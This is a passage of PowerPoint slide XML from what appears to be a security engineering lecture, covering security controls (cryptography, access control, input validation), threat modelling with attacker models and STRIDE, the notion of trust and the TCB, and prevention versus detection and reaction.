              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(related to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>repudiation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, and often involves confidentiality,  also of meta-data)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="1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BA7899-35F2-2B9A-EB56-5F0C44B4E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33981" y="548680"/>
            <a:ext cx="4265658" cy="5473726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Security controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRP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encryption  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signing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cryptographic protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="100" dirty="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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access control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which involves 4 steps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authentication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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authorisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2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monitoring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action/response</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acronym: AAAA for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Authentication Authorisation        </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Auditing Action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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	</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="2400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7FC2D6-E9B5-F813-EDD7-20DFB365EE8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12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28086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5A7C3-D0CF-97A4-E582-FCDC1BA4D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Threat modelling concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en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C4584-1D78-731E-4529-20D3FFBC7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980728"/>
            <a:ext cx="3808413" cy="5113686"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abuse cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack surface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="1800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92AB06-D1E0-3C1B-DCBD-F1301E2C8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9298" y="1340768"/>
            <a:ext cx="3668589" cy="2521714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security controls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B0F8EA-DF2B-33DF-4DDA-929FCD80326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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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24C91B99-79D8-0B1C-3DE2-4E7E4ECD570C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2073659" y="4426247"/>
            <a:ext cx="5413420" cy="1282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18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18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18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18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5pPr>
            <a:lvl6pPr marL="25146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8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kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>               Trust assumptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     every security control comes with its TCB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" kern="0" dirty="0"/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F81CB4E1-B397-88D0-A720-D263C38715D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3347865" y="1496223"/>
            <a:ext cx="1224136" cy="517025"/>
          </a:xfrm>
          <a:prstGeom prst="left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C69A4C01-9785-9BF6-662F-5E17D6947EE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="3067161">
            <a:off x="2477836" y="3488559"/>
            <a:ext cx="1224136" cy="477414"/>
          </a:xfrm>
          <a:prstGeom prst="left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5C437601-0A06-F666-9D50-9220A8E4E437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="18625492">
            <a:off x="4614569" y="3507255"/>
            <a:ext cx="1224136" cy="472777"/>
          </a:xfrm>
          <a:prstGeom prst="left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731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F5088-0EF5-A036-D357-37DEB1877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Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Trust</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Pieces NFI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47157-062F-F9E3-11D8-FD3973D79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Beware of the word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:latin typeface="Kunstler Script" panose="030304020206070D0D06" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>Trust  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>because it’s a confusing concept</a:t>
            </a:r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Trusted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≠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/>
              <a:t> trustworthy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Trust is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>negative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  quality: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    trust in X implies that  X can cause damage to you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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>So we want as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>little</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>  trust as possible, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>                                  and as small a TCB as possible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 Rule of thumb: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>          if something has the word ‘trust’ in the name,                                                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>          then it’s a scam or people have no clue what they mean by it</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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A5288-03D5-EBBC-F257-89A8A30255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492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3B1D249E-CF8A-42E7-8DB9-88F6D293CD93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4921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14</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-GB" alt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86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EC1C572-7892-6FC6-6F79-7714CD9D7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Threat modelling &amp; attacker models</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="24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C8B0CA4-2EE4-ACE3-4853-B85BA420C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800" dirty="0"/>
              <a:t>For threat modelling we do not only think about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> an attacker could attack, but also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> an attacker would want to and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> they’d want to achieve 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An attacker model can describe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>motivation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> and/or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>capabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> of an attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>There will often be multiple attacker models, as e.g. insider attacks come with a different attacker model than outsider attacks </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>One-line definition of threat modelling: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>            $ACTOR  does  $ACTION  to  $ASSET  for  $OUTCOME </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>                                                      because of  $MOTIVATION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>[Bruce Potter, Practical Threat Modeling, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Usenix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> Login (41:3), 2016,        </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>                                https://www.usenix.org/publications/login/fall2016/potter]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r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CACBF6-E562-4532-84B9-7D769A28905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15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72310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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD48226F-0663-C8F6-73C9-B5840A9F13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US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Threat modelling techniques  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="24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27FEA6-40BC-AC0B-B9EB-CDF5AE399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Draw diagram of the system and then brainstorm about attacks &amp; defenses using e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STRIDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack trees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sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/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rgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>poofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>epudiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nformation Disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>enial of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>levation of privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>When drawing diagrams, identifying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust boundaries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is useful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>If these STRIDE notions are not clear, read definitions on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> https://learn.microsoft.com/en-us/azure/security/develop/threat-modeling-tool-threats </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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sz="160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sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71684" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C83083-5739-D361-F733-9E78F1BCC9E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C2DB9568-0969-400E-A22D-0F04679D855D}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71685" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340FC73F-71DC-A4CF-3377-156F41499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60848"/>
            <a:ext cx="4536826" cy="2242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el 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA2353E7-092D-BB49-4838-ED9265C358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GB" altLang="en-US" sz="1800"/>
              <a:t>prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="3600"/>
              <a:t>detection &amp; reaction</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72707" name="Content Placeholder 3" descr="A picture containing sky&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D9FBA7F-704D-3808-542D-33A72852BD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4738" y="1063625"/>
            <a:ext cx="6992937" cy="5245100"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72708" name="Tijdelijke aanduiding voor dianummer 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B371EC9-DC07-6D45-05C2-F57ED32E2F7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CC7E6233-77BB-40EE-8960-A3114F0124FA}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-N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el 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D7AD5A-3698-9A69-FC4B-0FC3B195F5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14313"/>
            <a:ext cx="7770812" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800"/>
              <a:t>prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="3600"/>
              <a:t>detection &amp; reaction</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73731" name="Tijdelijke aanduiding voor inhoud 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43A26E31-B83A-016A-AE7F-222EE52776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63625"/>
            <a:ext cx="7770813" cy="5245100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34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nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> seems to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  way to ensure security, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detection &amp; response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>often more important and effective   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSz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nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>Eg.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1600" dirty="0"/>
              <a:t> breaking into a house with large windows is trivial; despite this absence of prevention, detection &amp; reaction still provides security against burglars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSz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nl-NL" sz="1600" dirty="0"/>
              <a:t>Most effective security requirement for most persons and  organisations: make good back-ups, so that you can recover after an attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSz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nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB don't ever  be tempted into thinking that good prevention makes detection &amp; reaction superfluous</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
